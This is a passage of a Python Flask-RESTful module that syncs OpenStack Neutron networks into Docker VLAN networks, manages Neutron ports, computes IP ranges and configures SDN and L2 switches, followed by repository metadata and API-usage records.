None).all()\n if not networks:\n em = \"no networks\"\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n allowed_networks = [network for network in networks if network.user_id == user_id]\n\n return {\"networks\": [marshal(network, NETWORK_FIELDS) for network in allowed_networks]}\n\n def post(self):\n \"\"\"\n method to sync Network from OpenStack's user define network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n try:\n # description = self.args.get(\"description\")\n user_id = self.context.get('user_id')\n\n # get user's all networks from OpenStack\n openstack_networks = get_user_networks(self.token)\n if not openstack_networks:\n return False, 500\n # get user's all network from docker(smurf)\n docker_networks = Network.query.filter(Network.user_id == user_id).all()\n if not docker_networks:\n invalid_nets = []\n else:\n invalid_nets = copy.copy(docker_networks)\n for openstack_network in openstack_networks:\n network_id = openstack_network\n subnet_ids = openstack_networks.get(network_id).get(\"sub_nets\")\n status = openstack_networks.get(network_id).get(\"status\")\n # get network's vni\n networksegment = NetworkSegments.query.filter(NetworkSegments.network_id == network_id).first()\n if networksegment is None:\n em = \"could not be find network's vni id from openstack. network id: {0}\".format(network_id)\n logger.info(em)\n return False, 500\n vni = networksegment.segmentation_id\n # if network has no Vxlan id. the container can not use that network\n if not vni:\n continue\n # generate uniqueness vlan id\n networks = Network.query.filter(Network.vlan != None).all()\n vlan_id = set(range(config.vlan_range[0], config.vlan_range[1])).difference(\n set([network.vlan for network in networks])).pop()\n if not vlan_id:\n em = 'no available vlan id allocation'\n logger.warn(em)\n return False, 500\n for subnet_id in subnet_ids:\n ret = [s for s in docker_networks if s.network_id == network_id and s.subnet_id == subnet_id]\n # if not found network in docker platform. add the network in docker platform\n data = get_subnet(self.token, subnet_id)\n if not data:\n return False, 500\n cidr = data.get('subnet').get('cidr')\n gateway = data.get('subnet').get('gateway_ip')\n name = data.get('subnet').get(\"name\")\n if not ret:\n # get openstack network's info\n # get subnet cidr and gateway\n network = Network(name=name, description=None, user_id=user_id, vlan=vlan_id, vni=vni,\n network_id=network_id, subnet_id=subnet_id, cidr=cidr, gateway=gateway,\n status=status)\n db_session.add(network)\n db_session.flush()\n else:\n Network.query.filter(and_(Network.network_id == network_id,\n Network.subnet_id == subnet_id)).update({Network.name: name,\n Network.status: status,\n Network.cidr: cidr,\n Network.gateway: gateway})\n # db_session.flush()\n db_session.commit()\n # if found network in docker platform. update network info\n # exclude OpenStack's networks from docker db. it is invalid networks\n invalid_nets = [s for s in invalid_nets if s.subnet_id != subnet_id and s.network_id != network_id]\n\n # delete invalid nets\n for invalid_net in invalid_nets:\n # remove network if is created on docker\n if invalid_net.iscreated:\n # subnet id is the docker network name\n net_name = invalid_net.subnet_id\n VlanNetworkManager.delete_network(net_name)\n Network.query.filter(and_(Network.network_id == invalid_net.network_id,\n Network.subnet_id == invalid_net.subnet_id)).delete()\n db_session.flush()\n\n db_session.commit()\n return True, 200\n except Exception as e:\n db_session.rollback()\n em = \"cannot sync network from OpenStack. msg: {0}\".format(e)\n logger.warn(em)\n return False, 500\n\n def delete(self, name):\n \"\"\"\n method to delete a Network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n\n user_id = self.context.get('user_id')\n exist_network = Network.query.filter(and_(Network.name == name, Network.removed == None)).first()\n if not exist_network:\n em = 'Network {0} is not exist'.format(name)\n logger.info(em)\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n network = Network.query.filter(\n and_(Network.user_id == user_id, Network.name == name)).first()\n try:\n # when delete a network we must recycling ports from openstack\n VlanIpaddress = VlanIpAddress.query.filter(VlanIpAddress.network_id == network.id).all()\n # recycling ports from openstack\n if VlanIpaddress:\n for VlanIpaddres in VlanIpaddress:\n ret = delete_port(self.token, VlanIpaddres.port_id)\n if ret.get(\"error\"):\n return ret\n db_session.delete(VlanIpaddres)\n db_session.flush()\n db_session.delete(network)\n db_session.commit()\n return {\"success\": [{\"code\": 200, \"msg\": \"\"}]}\n except Exception as e:\n em = \"Unable to delete network: {0}\".format(e)\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n\n def put(self):\n \"\"\"\n update a network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n\n name = self.args.get('name')\n user_id = self.context.get('user_id')\n n_name = self.args.get('n_name')\n description = self.args.get('description')\n data = {}\n if n_name:\n data.update({'name': n_name})\n if description:\n data.update({'description': description})\n\n exist_network = Network.query.filter(and_(Network.name == name,\n Network.removed == None,\n Network.user_id == user_id)).first()\n if not exist_network:\n em = 'Network {0} is not exist'.format(name)\n logger.info(em)\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n try:\n Network.query.filter(and_(Network.user_id == user_id,\n Network.name == name)).update(data)\n db_session.commit()\n return {'ec': 0, 'em': 'success'}\n except Exception as e:\n db_session.rollback()\n logger.warn('Unable to update networke, user id=`%s` name=`%s`' % (user_id, name))\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(e)}]}\n\n\ndef GetPortAbout(network_id, subnet_id, mac_address, tenant_id):\n \"\"\"\n method to get network's ip address from openstack \n :param token: \n :param network_id: \n :param subnet_id: \n :return: \n \"\"\"\n # get the admin token\n token = get_token()\n if not token:\n em = \"get admin token error......\"\n logger.warn(em)\n if not config.controler_host or not config.neutron_api_port:\n em = \"keystone_host or neutron_api_port is not configured\"\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n url = 'http://{0}:{1}/v2.0/ports'.format(config.controler_host, config.neutron_api_port)\n\n if not network_id or not subnet_id:\n em = \"invalid parameter network_id or subnet_id\"\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n\n bind_host = config.overlay_ip.replace(\".\", \"-\")\n # data = {\"port\": {\"network_id\": network_id,\n # \"fixed_ips\": [{\"subnet_id\": subnet_id}],\n # \"mac_address\": mac_address, \"device_owner\": \"neutron:LOADBALANCERV2\"}}\n\n data = {\"port\": {\"network_id\": network_id,\n \"tenant_id\": tenant_id,\n \"fixed_ips\": [{\"subnet_id\": subnet_id,\n }\n ],\n \"mac_address\": mac_address,\n \"binding:host_id\": bind_host,\n \"device_owner\": \"compute:nova\"\n }\n }\n data = json.dumps(data)\n\n header = {'Content-type': 'application/json', 'X-Auth-Token': token.strip()}\n ret = post_http(url=url, data=data, headers=header)\n # check is it error\n if ret.status_code != 201:\n em = \"openstack error.assign ip address from openstack error\"\n logger.warn(em)\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n return ret.json()\n\n\ndef delete_port(token, port_id):\n if not token or not port_id:\n em = \"token or port_id is invalid\"\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n header = {'X-Auth-Token': token.strip()}\n url = \"http://{0}:{1}/v2.0/ports/{2}\".format(config.controler_host,\n config.neutron_api_port,\n port_id.strip())\n ret = delete_http(url=url, headers=header)\n # check is it error\n if ret.status_code != 204:\n em = \"error delete port with id :{0}. code: <{1}>\".format(port_id, ret.status_code)\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n return {\"success\": [{\"code\": 200, \"msg\": \"\"}]}\n\n\ndef get_subnet(token, subnet_id):\n \"\"\"\n method to get subnet info from openstack\n :param token: \n :param subnet_id: \n :return: \n \"\"\"\n if not token or not subnet_id:\n em = \"token or subnet_id is invalid\"\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n header = {'X-Auth-Token': token.strip()}\n url = \"http://{0}:{1}/v2.0/subnets/{2}\".format(config.controler_host,\n config.neutron_api_port,\n subnet_id)\n ret = get_http(url=url, headers=header)\n # check is it error\n if ret.status_code != 200:\n return {}\n return ret.json()\n\n\nclass VlanNetworkManager(object):\n \"\"\"\n docker network Manager\n \"\"\"\n cmd_prefix = [\"docker network\"]\n\n @staticmethod\n def create_network(cidr, vlanID, name, gateway=None):\n \"\"\"\n method to add a vlan network\n :return: \n \"\"\"\n ip, mask = cidr.split('/')\n net_obj = IpExpr(ip, int(mask))\n start, end = net_obj.net_start, net_obj.net_end\n\n args = [\"create\",\n \"-d vlcp\",\n \"--ipam-driver vlcp\",\n \"--subnet {0}\".format(cidr),\n \"-o physicalnetwork=vlan\",\n \"-o vlanid={0}\".format(vlanID),\n \"-o subnet:allocated_start={0}\".format(start),\n \"-o subnet:allocated_end={0}\".format(end),\n \"{0}\".format(name)\n ]\n if gateway:\n gw_list = \"--gateway {0}\".format(gateway)\n args.insert(4, gw_list)\n full_args = VlanNetworkManager.cmd_prefix + args\n ret = exec_cmd(full_args)\n return ret\n\n @staticmethod\n def delete_network(name):\n \"\"\"\n method to delete a vlan network\n :return: \n \"\"\"\n args = [\"rm\",\n \"{0}\".format(name)\n ]\n full_args = VlanNetworkManager.cmd_prefix + args\n ret = exec_cmd(full_args)\n return ret\n\n\ndef get_user_networks(token):\n \"\"\"get user's all network from OpenStack\"\"\"\n if not token:\n em = \"invalid token\"\n logger.info(em)\n networks = {}\n headers = {'X-Auth-Token': token.strip()}\n ret = get_http(url=config.network_ep, headers=headers)\n if ret.status_code != 200:\n em = \"get network error.....\"\n logger.warn(em)\n return {}\n for network in ret.json()[\"networks\"]:\n mtu = network.get(\"mtu\")\n if mtu and mtu == 1450:\n net_id = network.get(\"id\")\n net_name = network.get(\"name\")\n sub_nets = network.get(\"subnets\")\n status = network.get(\"status\")\n networks[net_id] = {\"name\": net_name, \"sub_nets\": sub_nets, \"status\": status}\n return networks\n\n\nclass IpExpr(object):\n def __init__(self, ip, mask):\n self.ip = ip\n self.mask = mask\n self.network = self.get_network()\n self.broadcast = self.get_broadcast()\n self.net_int = self.get_net_int()\n self.dhcp_listen_addr = self.get_dhcp_listen_addr()\n self.available_ips = self.get_available_ips()\n self.gateway = self.get_gateway()\n self.net_start = self.get_start()\n self.net_end = self.get_end()\n\n def get_network(self):\n network = str(IP(self.ip).make_net(self.mask)).split('/')[0]\n return network\n\n def get_broadcast(self):\n broadcast = IP('{}/{}'.format(self.network, self.mask)).broadcast()\n return broadcast\n\n def get_net_int(self):\n net_int = socket.ntohl(struct.unpack(\"I\", socket.inet_aton(self.network))[0])\n return net_int\n\n def get_dhcp_listen_addr(self):\n dhcp_listen_addr = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + 1)))\n return dhcp_listen_addr\n\n def get_available_ips(self):\n available_ips = 2 ** (32 - self.mask) - 2\n return available_ips\n\n def get_gateway(self):\n gateway = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + self.available_ips)))\n return gateway\n\n def get_start(self):\n \"\"\"by default return network + 2(eg.192.168.0.0/24 return 192.168.0.2)\"\"\"\n start = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + 2)))\n return start\n\n def get_end(self):\n \"\"\"by default return broadcast - 2(eg.192.168.0.0/24 return 192.168.0.253)\"\"\"\n end = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + self.available_ips - 1)))\n return end\n\n\nclass ConfigureSdnSwitch(auth.X_resource):\n def post(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id').strip()\n sw_ip = self.args.get('sw_ip').strip()\n sw_pwd = self.args.get('sw_pwd').strip()\n sw_user = self.args.get('sw_user').strip()\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n vlan = network.vlan\n vni = network.vni\n if not network.iscreated:\n task = Thread(target=lambda: ConfigureSdnSwitch.add_vtep(sw_ip, sw_user, sw_pwd, vlan, vni))\n task.setDaemon(True)\n task.start()\n return {\"success\": {\"code\": 200, \"msg\": \"\"}}\n except Exception as e:\n db_session.rollback()\n em = \"config sdn switch error. msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n def delete(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id')\n sw_ip = self.args.get('sw_ip')\n sw_pwd = self.args.get('sw_pwd')\n sw_user = self.args.get('sw_user')\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n vlan = network.vlan\n if network.iscreated:\n task = Thread(target=lambda: ConfigureSdnSwitch.delete_vtep(sw_ip, sw_user, sw_pwd, vlan, network_id))\n task.setDaemon(True)\n task.start()\n return {\"success\": {\"code\": 200, \"msg\": \"\"}}\n except Exception as e:\n em = \"delete vtep error. msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n @staticmethod\n def add_vtep(sw_ip, sw_user, sw_pwd, vlan, vni):\n try:\n sdn_switch_obj = PyjsonrpcClient(sw_ip, username=sw_user, password=sw_pwd)\n vteps = sdn_switch_obj.get_vteps()\n if vteps.get(\"error\"):\n return vteps\n for vtep_index, vtep_ip in vteps.iteritems():\n sdn_switch_obj.add_vni_mapping(vlan, vni, vtep_index)\n except Exception as e:\n em = \"config sdn switch error. msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n @staticmethod\n def delete_vtep(sw_ip, sw_user, sw_pwd, vlan, network_id):\n try:\n sdn_switch_obj = PyjsonrpcClient(sw_ip, username=sw_user, password=sw_pwd)\n vteps = sdn_switch_obj.get_vteps()\n if vteps.get(\"error\"):\n return vteps\n for vtep_index, vtep_ip in vteps.iteritems():\n sdn_switch_obj.delete_vni_mapping(vlan, vtep_index)\n Network.query.filter(Network.network_id == network_id).update({Network.iscreated: False})\n db_session.commit()\n except Exception as e:\n db_session.rollback()\n em = \"delete vtep error. msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n\nclass ConfigureL2Switch(auth.X_resource):\n def post(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id').strip()\n sw_ip = self.args.get('sw_ip').strip()\n sw_port = self.args.get('sw_port').strip()\n sw_pwd = self.args.get('sw_pwd').strip()\n sw_user = self.args.get('sw_user').strip()\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n vlan = network.vlan\n ConfigureL2Switch.set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan)\n return 200\n except Exception as e:\n em = \"config l2 switch error ip: <{0}> msg: <{1}>\".format(sw_ip, e)\n logger.warn(em)\n return 500\n\n def delete(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id').strip()\n sw_ip = self.args.get('sw_ip').strip()\n sw_port = self.args.get('sw_port').strip()\n sw_pwd = self.args.get('sw_pwd').strip()\n sw_user = self.args.get('sw_user').strip()\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n ConfigureL2Switch.set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan=4094)\n except Exception as e:\n em = \"config l2 switch error ip: <{0}> msg: <{1}>\".format(sw_ip, e)\n logger.warn(em)\n return 500\n\n @staticmethod\n def set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_access(sw_port, vlan)\n\n @staticmethod\n def set_port_down(sw_ip, sw_user, sw_pwd, sw_port):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_down(sw_port)\n\n @staticmethod\n def set_port_up(sw_ip, sw_user, sw_pwd, sw_port):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_up(sw_port)\n", "repo_name": "freedomsunny/smurf", "sub_path": "smurf/resources/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 22323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "smurf.auth.X_resource", "line_number": 27, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 27, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 39, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 39, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.removed", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask_restful.marshal", "line_number": 45, "usage_type": "call"}, {"api_name": "common.NETWORK_FIELDS", "line_number": 45, "usage_type": "argument"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 62, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 62, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 66, "usage_type": "call"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.query.filter", "line_number": 72, "usage_type": "call"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.query", "line_number": 72, "usage_type": "attribute"}, {"api_name": "smurf.db.openstack_db.NetworkSegments", "line_number": 72, "usage_type": "name"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.network_id", "line_number": 72, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 82, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.vlan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "smurf.config.vlan_range", "line_number": 83, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 83, "usage_type": "name"}, {"api_name": "smurf.db.models.Network", "line_number": 101, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session.add", "line_number": 104, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 104, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.flush", "line_number": 105, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 105, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 107, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 107, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 107, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 107, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.subnet_id", "line_number": 108, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 108, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.name", "line_number": 108, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.status", "line_number": 109, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 109, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.cidr", "line_number": 110, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 110, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.gateway", "line_number": 111, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 111, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 113, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 113, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 125, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 125, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 125, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 125, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.subnet_id", "line_number": 126, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 126, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.flush", "line_number": 127, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 127, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 129, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 129, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 132, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 132, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 145, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 145, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 145, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 145, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.name", "line_number": 145, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.removed", "line_number": 145, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 150, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 150, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 150, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 151, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 151, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 151, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.name", "line_number": 151, "usage_type": "attribute"}, {"api_name": "smurf.db.models.VlanIpAddress.query.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "smurf.db.models.VlanIpAddress.query", "line_number": 154, "usage_type": "attribute"}, {"api_name": "smurf.db.models.VlanIpAddress", "line_number": 154, "usage_type": "name"}, {"api_name": "smurf.db.models.VlanIpAddress.network_id", "line_number": 154, "usage_type": "attribute"}, {"api_name": "smurf.db.models.db_session.delete", "line_number": 161, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 161, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.flush", "line_number": 162, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 162, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.delete", "line_number": 163, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 163, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 164, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 164, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 188, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 188, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 188, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 188, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.name", "line_number": 188, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.removed", "line_number": 189, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 189, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 190, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 190, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 196, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 196, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 196, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 196, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.name", "line_number": 197, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 197, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 198, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 198, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 201, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 201, "usage_type": "name"}, {"api_name": "smurf.utils.get_token", "line_number": 215, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 219, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 219, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 219, "usage_type": "attribute"}, {"api_name": "smurf.config.controler_host", "line_number": 223, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 223, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 223, "usage_type": "attribute"}, {"api_name": "smurf.config.overlay_ip.replace", "line_number": 230, "usage_type": "call"}, {"api_name": "smurf.config.overlay_ip", "line_number": 230, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 230, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 245, "usage_type": "call"}, {"api_name": "smurf.api_requests.api_requests.post_http", "line_number": 248, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 262, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 262, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 263, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 263, "usage_type": "name"}, {"api_name": "smurf.api_requests.api_requests.delete_http", "line_number": 265, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 284, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 284, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 285, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 285, "usage_type": "name"}, {"api_name": "smurf.api_requests.api_requests.get_http", "line_number": 287, "usage_type": "call"}, {"api_name": "smurf.utils.exec_cmd", "line_number": 324, "usage_type": "call"}, {"api_name": "smurf.utils.exec_cmd", "line_number": 337, "usage_type": "call"}, {"api_name": "smurf.api_requests.api_requests.get_http", "line_number": 348, "usage_type": "call"}, {"api_name": "smurf.config.network_ep", "line_number": 348, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 348, "usage_type": "name"}, {"api_name": "IPy.IP", "line_number": 378, "usage_type": "call"}, {"api_name": "IPy.IP", "line_number": 382, "usage_type": "call"}, {"api_name": "socket.ntohl", "line_number": 386, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 386, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 386, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 390, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 390, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 390, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 398, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 398, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 398, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 403, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 403, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 403, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 408, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 408, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 408, "usage_type": "call"}, {"api_name": "smurf.auth.X_resource", "line_number": 412, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 412, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 421, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 421, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 421, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 421, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 429, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 434, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 434, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 447, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 447, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 447, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 447, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 454, "usage_type": "call"}, {"api_name": "smurf.api_requests.sdn_switch_config.PyjsonrpcClient", "line_number": 466, "usage_type": "call"}, {"api_name": "smurf.api_requests.sdn_switch_config.PyjsonrpcClient", "line_number": 480, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 486, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 486, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.iscreated", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 487, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 487, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 489, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 489, "usage_type": "name"}, {"api_name": "smurf.auth.X_resource", "line_number": 495, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 495, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 505, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 505, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 505, "usage_type": "name"}, 